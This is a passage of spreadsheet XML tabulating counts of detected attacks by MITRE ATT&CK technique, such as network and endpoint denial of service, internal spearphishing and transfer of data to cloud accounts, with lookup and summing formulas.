      <c r="BF48" s="12">
        <v>4</v>
      </c>
      <c r="BG48" s="13">
        <v>1</v>
      </c>
      <c r="BH48" s="394">
        <v>4</v>
      </c>
      <c r="BI48" s="292">
        <v>0</v>
      </c>
      <c r="BJ48" s="322">
        <v>0</v>
      </c>
      <c r="BK48" s="322">
        <v>0</v>
      </c>
      <c r="BL48" s="12">
        <v>0</v>
      </c>
      <c r="BM48" s="13">
        <v>0</v>
      </c>
      <c r="BN48" s="394">
        <v>0</v>
      </c>
      <c r="BO48" s="292">
        <v>13</v>
      </c>
      <c r="BP48" s="322">
        <v>10</v>
      </c>
      <c r="BQ48" s="322">
        <v>0</v>
      </c>
      <c r="BR48" s="12">
        <v>0</v>
      </c>
      <c r="BS48" s="12">
        <v>5</v>
      </c>
      <c r="BT48" s="13">
        <v>1</v>
      </c>
      <c r="BU48" s="394">
        <v>10</v>
      </c>
      <c r="BV48" s="292">
        <v>2</v>
      </c>
      <c r="BW48" s="322">
        <v>2</v>
      </c>
      <c r="BX48" s="322">
        <v>0</v>
      </c>
      <c r="BY48" s="12">
        <v>1</v>
      </c>
      <c r="BZ48" s="13">
        <v>1</v>
      </c>
      <c r="CA48" s="394">
        <v>2</v>
      </c>
      <c r="CB48" s="292">
        <v>6</v>
      </c>
      <c r="CC48" s="322">
        <v>6</v>
      </c>
      <c r="CD48" s="322">
        <v>0</v>
      </c>
      <c r="CE48" s="12">
        <v>1</v>
      </c>
      <c r="CF48" s="12">
        <v>3</v>
      </c>
      <c r="CG48" s="13">
        <v>1</v>
      </c>
      <c r="CH48" s="394">
        <v>4</v>
      </c>
    </row>
    <row r="49" spans="1:86" ht="15" customHeight="1">
      <c r="A49" s="4">
        <f t="shared" si="0"/>
        <v>47</v>
      </c>
      <c r="B49" s="4" t="str">
        <f>IFERROR(VLOOKUP(A49,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1498</v>
      </c>
      <c r="C49" s="493" t="str">
        <f>IFERROR(VLOOKUP(B49,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Network Denial of Service</v>
      </c>
      <c r="D49" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B49)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>8</v>
      </c>
      <c r="E49" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1432072</v>
      </c>
      <c r="F49" s="579" t="str">
        <f t="shared" si="1"/>
        <v>8 (1432072)</v>
      </c>
      <c r="G49" s="292">
        <v>272</v>
      </c>
      <c r="H49" s="322">
        <v>251</v>
      </c>
      <c r="I49" s="322">
        <v>0</v>
      </c>
      <c r="J49" s="12">
        <v>2</v>
      </c>
      <c r="K49" s="13">
        <v>0.375</v>
      </c>
      <c r="L49" s="394">
        <v>251</v>
      </c>
      <c r="M49" s="322">
        <v>603</v>
      </c>
      <c r="N49" s="322">
        <v>603</v>
      </c>
      <c r="O49" s="322">
        <v>0</v>
      </c>
      <c r="P49" s="12">
        <v>2</v>
      </c>
      <c r="Q49" s="13">
        <v>0.25</v>
      </c>
      <c r="R49" s="394">
        <v>603</v>
      </c>
      <c r="S49" s="292">
        <v>875</v>
      </c>
      <c r="T49" s="322">
        <v>854</v>
      </c>
      <c r="U49" s="322">
        <v>0</v>
      </c>
      <c r="V49" s="12">
        <v>4</v>
      </c>
      <c r="W49" s="13">
        <v>0.375</v>
      </c>
      <c r="X49" s="394">
        <v>854</v>
      </c>
      <c r="Y49" s="392">
        <v>376333</v>
      </c>
      <c r="Z49" s="392">
        <v>310064</v>
      </c>
      <c r="AA49" s="322">
        <v>0</v>
      </c>
      <c r="AB49" s="392">
        <v>6</v>
      </c>
      <c r="AC49" s="16">
        <v>1</v>
      </c>
      <c r="AD49" s="394">
        <v>163753</v>
      </c>
      <c r="AE49" s="392">
        <v>196751</v>
      </c>
      <c r="AF49" s="392">
        <v>176330</v>
      </c>
      <c r="AG49" s="322">
        <v>0</v>
      </c>
      <c r="AH49" s="392">
        <v>14</v>
      </c>
      <c r="AI49" s="16">
        <v>1</v>
      </c>
      <c r="AJ49" s="394">
        <v>118235</v>
      </c>
      <c r="AK49" s="392">
        <v>573084</v>
      </c>
      <c r="AL49" s="392">
        <v>486394</v>
      </c>
      <c r="AM49" s="322">
        <v>0</v>
      </c>
      <c r="AN49" s="392">
        <v>20</v>
      </c>
      <c r="AO49" s="16">
        <v>1</v>
      </c>
      <c r="AP49" s="394">
        <v>224253</v>
      </c>
      <c r="AQ49" s="292">
        <v>0</v>
      </c>
      <c r="AR49" s="322">
        <v>0</v>
      </c>
      <c r="AS49" s="322">
        <v>0</v>
      </c>
      <c r="AT49" s="12">
        <v>0</v>
      </c>
      <c r="AU49" s="13">
        <v>0</v>
      </c>
      <c r="AV49" s="394">
        <v>0</v>
      </c>
      <c r="AW49" s="392">
        <v>11832</v>
      </c>
      <c r="AX49" s="392">
        <v>41</v>
      </c>
      <c r="AY49" s="322">
        <v>0</v>
      </c>
      <c r="AZ49" s="4">
        <v>2</v>
      </c>
      <c r="BA49" s="16">
        <v>0.75</v>
      </c>
      <c r="BB49" s="394">
        <v>41</v>
      </c>
      <c r="BC49" s="292">
        <v>12707</v>
      </c>
      <c r="BD49" s="322">
        <v>895</v>
      </c>
      <c r="BE49" s="322">
        <v>0</v>
      </c>
      <c r="BF49" s="12">
        <v>6</v>
      </c>
      <c r="BG49" s="13">
        <v>1</v>
      </c>
      <c r="BH49" s="394">
        <v>895</v>
      </c>
      <c r="BI49" s="292">
        <v>649069</v>
      </c>
      <c r="BJ49" s="322">
        <v>649068</v>
      </c>
      <c r="BK49" s="322">
        <v>0</v>
      </c>
      <c r="BL49" s="12">
        <v>4</v>
      </c>
      <c r="BM49" s="13">
        <v>0.5</v>
      </c>
      <c r="BN49" s="394">
        <v>649068</v>
      </c>
      <c r="BO49" s="292">
        <v>1266580</v>
      </c>
      <c r="BP49" s="322">
        <v>1255760</v>
      </c>
      <c r="BQ49" s="322">
        <v>0</v>
      </c>
      <c r="BR49" s="12">
        <v>4</v>
      </c>
      <c r="BS49" s="12">
        <v>10</v>
      </c>
      <c r="BT49" s="13">
        <v>1</v>
      </c>
      <c r="BU49" s="394">
        <v>649625</v>
      </c>
      <c r="BV49" s="292">
        <v>19670</v>
      </c>
      <c r="BW49" s="322">
        <v>19670</v>
      </c>
      <c r="BX49" s="322">
        <v>0</v>
      </c>
      <c r="BY49" s="12">
        <v>2</v>
      </c>
      <c r="BZ49" s="13">
        <v>0.25</v>
      </c>
      <c r="CA49" s="394">
        <v>19670</v>
      </c>
      <c r="CB49" s="292">
        <v>1451718</v>
      </c>
      <c r="CC49" s="322">
        <v>1382981</v>
      </c>
      <c r="CD49" s="322">
        <v>0</v>
      </c>
      <c r="CE49" s="12">
        <v>2</v>
      </c>
      <c r="CF49" s="12">
        <v>4</v>
      </c>
      <c r="CG49" s="13">
        <v>0.5</v>
      </c>
      <c r="CH49" s="394">
        <v>1363311</v>
      </c>
    </row>
    <row r="50" spans="1:86" ht="15" customHeight="1">
      <c r="A50" s="4">
        <f t="shared" si="0"/>
        <v>48</v>
      </c>
      <c r="B50" s="4" t="str">
        <f>IFERROR(VLOOKUP(A50,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1499</v>
      </c>
      <c r="C50" s="493" t="str">
        <f>IFERROR(VLOOKUP(B50,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Endpoint Denial of Service</v>
      </c>
      <c r="D50" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B50)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>10</v>
      </c>
      <c r="E50" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B50,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2061420</v>
      </c>
      <c r="F50" s="579" t="str">
        <f t="shared" si="1"/>
        <v>10 (2061420)</v>
      </c>
      <c r="G50" s="292">
        <v>11125</v>
      </c>
      <c r="H50" s="322">
        <v>6346</v>
      </c>
      <c r="I50" s="322">
        <v>0</v>
      </c>
      <c r="J50" s="12">
        <v>6</v>
      </c>
      <c r="K50" s="13">
        <v>0.5</v>
      </c>
      <c r="L50" s="394">
        <v>6296</v>
      </c>
      <c r="M50" s="322">
        <v>2</v>
      </c>
      <c r="N50" s="322">
        <v>2</v>
      </c>
      <c r="O50" s="322">
        <v>0</v>
      </c>
      <c r="P50" s="12">
        <v>2</v>
      </c>
      <c r="Q50" s="13">
        <v>0.2</v>
      </c>
      <c r="R50" s="394">
        <v>2</v>
      </c>
      <c r="S50" s="292">
        <v>11127</v>
      </c>
      <c r="T50" s="322">
        <v>6348</v>
      </c>
      <c r="U50" s="322">
        <v>0</v>
      </c>
      <c r="V50" s="12">
        <v>8</v>
      </c>
      <c r="W50" s="13">
        <v>0.6</v>
      </c>
      <c r="X50" s="394">
        <v>6297</v>
      </c>
      <c r="Y50" s="392">
        <v>688007</v>
      </c>
      <c r="Z50" s="392">
        <v>51403</v>
      </c>
      <c r="AA50" s="322">
        <v>0</v>
      </c>
      <c r="AB50" s="392">
        <v>13</v>
      </c>
      <c r="AC50" s="16">
        <v>0.7</v>
      </c>
      <c r="AD50" s="394">
        <v>33808</v>
      </c>
      <c r="AE50" s="392">
        <v>116273</v>
      </c>
      <c r="AF50" s="392">
        <v>76</v>
      </c>
      <c r="AG50" s="322">
        <v>0</v>
      </c>
      <c r="AH50" s="392">
        <v>7</v>
      </c>
      <c r="AI50" s="16">
        <v>1</v>
      </c>
      <c r="AJ50" s="394">
        <v>63</v>
      </c>
      <c r="AK50" s="392">
        <v>804280</v>
      </c>
      <c r="AL50" s="392">
        <v>51479</v>
      </c>
      <c r="AM50" s="322">
        <v>0</v>
      </c>
      <c r="AN50" s="392">
        <v>20</v>
      </c>
      <c r="AO50" s="16">
        <v>1</v>
      </c>
      <c r="AP50" s="394">
        <v>33828</v>
      </c>
      <c r="AQ50" s="292">
        <v>0</v>
      </c>
      <c r="AR50" s="322">
        <v>0</v>
      </c>
      <c r="AS50" s="322">
        <v>0</v>
      </c>
      <c r="AT50" s="12">
        <v>0</v>
      </c>
      <c r="AU50" s="13">
        <v>0</v>
      </c>
      <c r="AV50" s="394">
        <v>0</v>
      </c>
      <c r="AW50" s="392">
        <v>658</v>
      </c>
      <c r="AX50" s="392">
        <v>612</v>
      </c>
      <c r="AY50" s="322">
        <v>0</v>
      </c>
      <c r="AZ50" s="4">
        <v>2</v>
      </c>
      <c r="BA50" s="16">
        <v>0.3</v>
      </c>
      <c r="BB50" s="394">
        <v>612</v>
      </c>
      <c r="BC50" s="292">
        <v>11785</v>
      </c>
      <c r="BD50" s="322">
        <v>6960</v>
      </c>
      <c r="BE50" s="322">
        <v>0</v>
      </c>
      <c r="BF50" s="12">
        <v>10</v>
      </c>
      <c r="BG50" s="13">
        <v>0.7</v>
      </c>
      <c r="BH50" s="394">
        <v>6862</v>
      </c>
      <c r="BI50" s="292">
        <v>5738</v>
      </c>
      <c r="BJ50" s="322">
        <v>5175</v>
      </c>
      <c r="BK50" s="322">
        <v>0</v>
      </c>
      <c r="BL50" s="12">
        <v>4</v>
      </c>
      <c r="BM50" s="13">
        <v>0.3</v>
      </c>
      <c r="BN50" s="394">
        <v>4661</v>
      </c>
      <c r="BO50" s="292">
        <v>700858</v>
      </c>
      <c r="BP50" s="322">
        <v>700293</v>
      </c>
      <c r="BQ50" s="322">
        <v>0</v>
      </c>
      <c r="BR50" s="12">
        <v>4</v>
      </c>
      <c r="BS50" s="12">
        <v>11</v>
      </c>
      <c r="BT50" s="13">
        <v>0.7</v>
      </c>
      <c r="BU50" s="394">
        <v>361386</v>
      </c>
      <c r="BV50" s="292">
        <v>28</v>
      </c>
      <c r="BW50" s="322">
        <v>28</v>
      </c>
      <c r="BX50" s="322">
        <v>0</v>
      </c>
      <c r="BY50" s="12">
        <v>2</v>
      </c>
      <c r="BZ50" s="13">
        <v>0.2</v>
      </c>
      <c r="CA50" s="394">
        <v>28</v>
      </c>
      <c r="CB50" s="292">
        <v>1839973</v>
      </c>
      <c r="CC50" s="322">
        <v>1116298</v>
      </c>
      <c r="CD50" s="322">
        <v>0</v>
      </c>
      <c r="CE50" s="12">
        <v>2</v>
      </c>
      <c r="CF50" s="12">
        <v>2</v>
      </c>
      <c r="CG50" s="13">
        <v>0.5</v>
      </c>
      <c r="CH50" s="394">
        <v>1116270</v>
      </c>
    </row>
    <row r="51" spans="1:86" ht="15" customHeight="1">
      <c r="A51" s="4">
        <f t="shared" si="0"/>
        <v>49</v>
      </c>
      <c r="B51" s="4" t="str">
        <f>IFERROR(VLOOKUP(A51,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1505</v>
      </c>
      <c r="C51" s="493" t="str">
        <f>IFERROR(VLOOKUP(B51,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Server Software Component</v>
      </c>
      <c r="D51" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B51)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E51" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B51,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F51" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (3)</v>
      </c>
      <c r="G51" s="292">
        <v>2</v>
      </c>
      <c r="H51" s="322">
        <v>1</v>
      </c>
      <c r="I51" s="322">
        <v>0</v>
      </c>
      <c r="J51" s="12">
        <v>1</v>
      </c>
      <c r="K51" s="13">
        <v>1</v>
      </c>
      <c r="L51" s="394">
        <v>1</v>
      </c>
      <c r="M51" s="322">
        <v>0</v>
      </c>
      <c r="N51" s="322">
        <v>0</v>
      </c>
      <c r="O51" s="322">
        <v>0</v>
      </c>
      <c r="P51" s="12">
        <v>0</v>
      </c>
      <c r="Q51" s="13">
        <v>0</v>
      </c>
      <c r="R51" s="394">
        <v>0</v>
      </c>
      <c r="S51" s="292">
        <v>2</v>
      </c>
      <c r="T51" s="322">
        <v>1</v>
      </c>
      <c r="U51" s="322">
        <v>0</v>
      </c>
      <c r="V51" s="12">
        <v>1</v>
      </c>
      <c r="W51" s="13">
        <v>1</v>
      </c>
      <c r="X51" s="394">
        <v>1</v>
      </c>
      <c r="Y51" s="392">
        <v>2</v>
      </c>
      <c r="Z51" s="392">
        <v>1</v>
      </c>
      <c r="AA51" s="322">
        <v>0</v>
      </c>
      <c r="AB51" s="392">
        <v>1</v>
      </c>
      <c r="AC51" s="16">
        <v>1</v>
      </c>
      <c r="AD51" s="394">
        <v>1</v>
      </c>
      <c r="AE51" s="392">
        <v>5</v>
      </c>
      <c r="AF51" s="392">
        <v>3</v>
      </c>
      <c r="AG51" s="322">
        <v>0</v>
      </c>
      <c r="AH51" s="392">
        <v>3</v>
      </c>
      <c r="AI51" s="16">
        <v>1</v>
      </c>
      <c r="AJ51" s="394">
        <v>2</v>
      </c>
      <c r="AK51" s="392">
        <v>7</v>
      </c>
      <c r="AL51" s="392">
        <v>4</v>
      </c>
      <c r="AM51" s="322">
        <v>0</v>
      </c>
      <c r="AN51" s="392">
        <v>4</v>
      </c>
      <c r="AO51" s="16">
        <v>1</v>
      </c>
      <c r="AP51" s="394">
        <v>3</v>
      </c>
      <c r="AQ51" s="292">
        <v>0</v>
      </c>
      <c r="AR51" s="322">
        <v>0</v>
      </c>
      <c r="AS51" s="322">
        <v>0</v>
      </c>
      <c r="AT51" s="12">
        <v>0</v>
      </c>
      <c r="AU51" s="13">
        <v>0</v>
      </c>
      <c r="AV51" s="394">
        <v>0</v>
      </c>
      <c r="AW51" s="392">
        <v>0</v>
      </c>
      <c r="AX51" s="392">
        <v>0</v>
      </c>
      <c r="AY51" s="322">
        <v>0</v>
      </c>
      <c r="AZ51" s="4">
        <v>0</v>
      </c>
      <c r="BA51" s="16">
        <v>0</v>
      </c>
      <c r="BB51" s="394">
        <v>0</v>
      </c>
      <c r="BC51" s="292">
        <v>2</v>
      </c>
      <c r="BD51" s="322">
        <v>1</v>
      </c>
      <c r="BE51" s="322">
        <v>0</v>
      </c>
      <c r="BF51" s="12">
        <v>1</v>
      </c>
      <c r="BG51" s="13">
        <v>1</v>
      </c>
      <c r="BH51" s="394">
        <v>1</v>
      </c>
      <c r="BI51" s="292">
        <v>1</v>
      </c>
      <c r="BJ51" s="322">
        <v>1</v>
      </c>
      <c r="BK51" s="322">
        <v>0</v>
      </c>
      <c r="BL51" s="12">
        <v>1</v>
      </c>
      <c r="BM51" s="13">
        <v>1</v>
      </c>
      <c r="BN51" s="394">
        <v>1</v>
      </c>
      <c r="BO51" s="292">
        <v>5</v>
      </c>
      <c r="BP51" s="322">
        <v>5</v>
      </c>
      <c r="BQ51" s="322">
        <v>0</v>
      </c>
      <c r="BR51" s="12">
        <v>1</v>
      </c>
      <c r="BS51" s="12">
        <v>2</v>
      </c>
      <c r="BT51" s="13">
        <v>1</v>
      </c>
      <c r="BU51" s="394">
        <v>2</v>
      </c>
      <c r="BV51" s="292">
        <v>1</v>
      </c>
      <c r="BW51" s="322">
        <v>1</v>
      </c>
      <c r="BX51" s="322">
        <v>0</v>
      </c>
      <c r="BY51" s="12">
        <v>1</v>
      </c>
      <c r="BZ51" s="13">
        <v>1</v>
      </c>
      <c r="CA51" s="394">
        <v>1</v>
      </c>
      <c r="CB51" s="292">
        <v>4</v>
      </c>
      <c r="CC51" s="322">
        <v>3</v>
      </c>
      <c r="CD51" s="322">
        <v>0</v>
      </c>
      <c r="CE51" s="12">
        <v>1</v>
      </c>
      <c r="CF51" s="12">
        <v>1</v>
      </c>
      <c r="CG51" s="13">
        <v>1</v>
      </c>
      <c r="CH51" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="52" spans="1:86" ht="15" customHeight="1">
      <c r="A52" s="4">
        <f t="shared" si="0"/>
        <v>50</v>
      </c>
      <c r="B52" s="4" t="str">
        <f>IFERROR(VLOOKUP(A52,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1534</v>
      </c>
      <c r="C52" s="493" t="str">
        <f>IFERROR(VLOOKUP(B52,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Internal Spearphishing</v>
      </c>
      <c r="D52" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B52)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E52" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>10</v>
      </c>
      <c r="F52" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (10)</v>
      </c>
      <c r="G52" s="292">
        <v>12</v>
      </c>
      <c r="H52" s="322">
        <v>8</v>
      </c>
      <c r="I52" s="322">
        <v>0</v>
      </c>
      <c r="J52" s="12">
        <v>3</v>
      </c>
      <c r="K52" s="13">
        <v>1</v>
      </c>
      <c r="L52" s="394">
        <v>5</v>
      </c>
      <c r="M52" s="322">
        <v>0</v>
      </c>
      <c r="N52" s="322">
        <v>0</v>
      </c>
      <c r="O52" s="322">
        <v>0</v>
      </c>
      <c r="P52" s="12">
        <v>0</v>
      </c>
      <c r="Q52" s="13">
        <v>0</v>
      </c>
      <c r="R52" s="394">
        <v>0</v>
      </c>
      <c r="S52" s="292">
        <v>12</v>
      </c>
      <c r="T52" s="322">
        <v>8</v>
      </c>
      <c r="U52" s="322">
        <v>0</v>
      </c>
      <c r="V52" s="12">
        <v>3</v>
      </c>
      <c r="W52" s="13">
        <v>1</v>
      </c>
      <c r="X52" s="394">
        <v>5</v>
      </c>
      <c r="Y52" s="392">
        <v>34</v>
      </c>
      <c r="Z52" s="392">
        <v>13</v>
      </c>
      <c r="AA52" s="322">
        <v>0</v>
      </c>
      <c r="AB52" s="392">
        <v>8</v>
      </c>
      <c r="AC52" s="16">
        <v>1</v>
      </c>
      <c r="AD52" s="394">
        <v>6</v>
      </c>
      <c r="AE52" s="392">
        <v>9</v>
      </c>
      <c r="AF52" s="392">
        <v>7</v>
      </c>
      <c r="AG52" s="322">
        <v>0</v>
      </c>
      <c r="AH52" s="392">
        <v>3</v>
      </c>
      <c r="AI52" s="16">
        <v>1</v>
      </c>
      <c r="AJ52" s="394">
        <v>4</v>
      </c>
      <c r="AK52" s="392">
        <v>43</v>
      </c>
      <c r="AL52" s="392">
        <v>20</v>
      </c>
      <c r="AM52" s="322">
        <v>0</v>
      </c>
      <c r="AN52" s="392">
        <v>11</v>
      </c>
      <c r="AO52" s="16">
        <v>1</v>
      </c>
      <c r="AP52" s="394">
        <v>9</v>
      </c>
      <c r="AQ52" s="292">
        <v>0</v>
      </c>
      <c r="AR52" s="322">
        <v>0</v>
      </c>
      <c r="AS52" s="322">
        <v>0</v>
      </c>
      <c r="AT52" s="12">
        <v>0</v>
      </c>
      <c r="AU52" s="13">
        <v>0</v>
      </c>
      <c r="AV52" s="394">
        <v>0</v>
      </c>
      <c r="AW52" s="392">
        <v>19</v>
      </c>
      <c r="AX52" s="392">
        <v>3</v>
      </c>
      <c r="AY52" s="322">
        <v>0</v>
      </c>
      <c r="AZ52" s="4">
        <v>3</v>
      </c>
      <c r="BA52" s="16">
        <v>1</v>
      </c>
      <c r="BB52" s="394">
        <v>3</v>
      </c>
      <c r="BC52" s="292">
        <v>31</v>
      </c>
      <c r="BD52" s="322">
        <v>11</v>
      </c>
      <c r="BE52" s="322">
        <v>0</v>
      </c>
      <c r="BF52" s="12">
        <v>6</v>
      </c>
      <c r="BG52" s="13">
        <v>1</v>
      </c>
      <c r="BH52" s="394">
        <v>6</v>
      </c>
      <c r="BI52" s="292">
        <v>0</v>
      </c>
      <c r="BJ52" s="322">
        <v>0</v>
      </c>
      <c r="BK52" s="322">
        <v>0</v>
      </c>
      <c r="BL52" s="12">
        <v>0</v>
      </c>
      <c r="BM52" s="13">
        <v>0</v>
      </c>
      <c r="BN52" s="394">
        <v>0</v>
      </c>
      <c r="BO52" s="292">
        <v>10</v>
      </c>
      <c r="BP52" s="322">
        <v>10</v>
      </c>
      <c r="BQ52" s="322">
        <v>0</v>
      </c>
      <c r="BR52" s="12">
        <v>0</v>
      </c>
      <c r="BS52" s="12">
        <v>4</v>
      </c>
      <c r="BT52" s="13">
        <v>1</v>
      </c>
      <c r="BU52" s="394">
        <v>10</v>
      </c>
      <c r="BV52" s="292">
        <v>0</v>
      </c>
      <c r="BW52" s="322">
        <v>0</v>
      </c>
      <c r="BX52" s="322">
        <v>0</v>
      </c>
      <c r="BY52" s="12">
        <v>0</v>
      </c>
      <c r="BZ52" s="13">
        <v>0</v>
      </c>
      <c r="CA52" s="394">
        <v>0</v>
      </c>
      <c r="CB52" s="292">
        <v>0</v>
      </c>
      <c r="CC52" s="322">
        <v>0</v>
      </c>
      <c r="CD52" s="322">
        <v>0</v>
      </c>
      <c r="CE52" s="12">
        <v>0</v>
      </c>
      <c r="CF52" s="12">
        <v>0</v>
      </c>
      <c r="CG52" s="13">
        <v>0</v>
      </c>
      <c r="CH52" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="53" spans="1:86" ht="15" customHeight="1">
      <c r="A53" s="4">
        <f t="shared" si="0"/>
        <v>51</v>
      </c>
      <c r="B53" s="4" t="str">
        <f>IFERROR(VLOOKUP(A53,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1537</v>
      </c>
      <c r="C53" s="493" t="str">
        <f>IFERROR(VLOOKUP(B53,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Transfer Data to Cloud Account</v>
      </c>
      <c r="D53" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B53)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E53" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>76</v>
      </c>
      <c r="F53" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (76)</v>
      </c>
      <c r="G53" s="292">
        <v>25</v>
      </c>
      <c r="H53" s="322">
        <v>25</v>
      </c>
      <c r="I53" s="322">
        <v>0</v>
      </c>
      <c r="J53" s="12">
        <v>4</v>
      </c>
      <c r="K53" s="13">
        <v>1</v>
      </c>
      <c r="L53" s="394">
        <v>8</v>
      </c>
      <c r="M53" s="322">
        <v>0</v>
      </c>
      <c r="N53" s="322">
        <v>0</v>
      </c>
      <c r="O53" s="322">
        <v>0</v>
      </c>
      <c r="P53" s="12">
        <v>0</v>
      </c>
      <c r="Q53" s="13">
        <v>0</v>
      </c>
      <c r="R53" s="394">
        <v>0</v>
      </c>
      <c r="S53" s="292">
        <v>25</v>
      </c>
      <c r="T53" s="322">
        <v>25</v>
      </c>
      <c r="U53" s="322">
        <v>0</v>
      </c>
      <c r="V53" s="12">
        <v>4</v>
      </c>
      <c r="W53" s="13">
        <v>1</v>
      </c>
      <c r="X53" s="394">
        <v>8</v>
      </c>
      <c r="Y53" s="392">
        <v>33</v>
      </c>
      <c r="Z53" s="392">
        <v>33</v>
      </c>
      <c r="AA53" s="322">
        <v>0</v>
      </c>
      <c r="AB53" s="392">
        <v>6</v>
      </c>
      <c r="AC53" s="16">
        <v>1</v>
      </c>
      <c r="AD53" s="394">
        <v>13</v>
      </c>
      <c r="AE53" s="392">
        <v>17</v>
      </c>
      <c r="AF53" s="392">
        <v>17</v>
      </c>
      <c r="AG53" s="322">
        <v>0</v>
      </c>
      <c r="AH53" s="392">
        <v>5</v>
      </c>
      <c r="AI53" s="16">
        <v>1</v>
      </c>
      <c r="AJ53" s="394">
        <v>13</v>
      </c>
      <c r="AK53" s="392">
        <v>50</v>
      </c>
      <c r="AL53" s="392">
        <v>50</v>
      </c>
      <c r="AM53" s="322">
        <v>0</v>
      </c>
      <c r="AN53" s="392">
        <v>11</v>
      </c>
      <c r="AO53" s="16">
        <v>1</v>
      </c>
      <c r="AP53" s="394">
        <v>20</v>
      </c>
      <c r="AQ53" s="292">
        <v>0</v>
      </c>
      <c r="AR53" s="322">
        <v>0</v>
      </c>
      <c r="AS53" s="322">
        <v>0</v>
      </c>
      <c r="AT53" s="12">
        <v>0</v>
      </c>
      <c r="AU53" s="13">
        <v>0</v>
      </c>
      <c r="AV53" s="394">
        <v>0</v>
      </c>
      <c r="AW53" s="392">
        <v>5</v>
      </c>
      <c r="AX53" s="392">
        <v>5</v>
      </c>
      <c r="AY53" s="322">
        <v>0</v>
      </c>
      <c r="AZ53" s="4">
        <v>1</v>
      </c>
      <c r="BA53" s="16">
        <v>1</v>
      </c>
      <c r="BB53" s="394">
        <v>5</v>
      </c>
      <c r="BC53" s="292">
        <v>30</v>
      </c>
      <c r="BD53" s="322">
        <v>30</v>
      </c>
      <c r="BE53" s="322">
        <v>0</v>
      </c>
      <c r="BF53" s="12">
        <v>5</v>
      </c>
      <c r="BG53" s="13">
        <v>1</v>
      </c>
      <c r="BH53" s="394">
        <v>13</v>
      </c>
      <c r="BI53" s="292">
        <v>8</v>
      </c>
      <c r="BJ53" s="322">
        <v>8</v>
      </c>
      <c r="BK53" s="322">
        <v>0</v>
      </c>
      <c r="BL53" s="12">
        <v>1</v>
      </c>
      <c r="BM53" s="13">
        <v>1</v>
      </c>
      <c r="BN53" s="394">
        <v>8</v>
      </c>
      <c r="BO53" s="292">
        <v>83</v>
      </c>
      <c r="BP53" s="322">
        <v>83</v>
      </c>
      <c r="BQ53" s="322">
        <v>0</v>
      </c>
      <c r="BR53" s="12">
        <v>1</v>
      </c>
      <c r="BS53" s="12">
        <v>5</v>
      </c>
      <c r="BT53" s="13">
        <v>1</v>
      </c>
      <c r="BU53" s="394">
        <v>75</v>
      </c>
      <c r="BV53" s="292">
        <v>0</v>
      </c>
      <c r="BW53" s="322">
        <v>0</v>
      </c>
      <c r="BX53" s="322">
        <v>0</v>
      </c>
      <c r="BY53" s="12">
        <v>0</v>
      </c>
      <c r="BZ53" s="13">
        <v>0</v>
      </c>
      <c r="CA53" s="394">
        <v>0</v>
      </c>
      <c r="CB53" s="292">
        <v>0</v>
      </c>
      <c r="CC53" s="322">
        <v>0</v>
      </c>
      <c r="CD53" s="322">
        <v>0</v>
      </c>
      <c r="CE53" s="12">
        <v>0</v>
      </c>
      <c r="CF53" s="12">
        <v>0</v>
      </c>
      <c r="CG53" s="13">
        <v>0</v>
      </c>
      <c r="CH53" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="54" spans="1:86" ht="15" customHeight="1">
      <c r="A54" s="4">
        <f t="shared" si="0"/>
        <v>52</v>
      </c>
      <c r="B54" s="4" t="str">
        <f>IFERROR(VLOOKUP(A54,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1542</v>
      </c>
      <c r="C54" s="493" t="str">
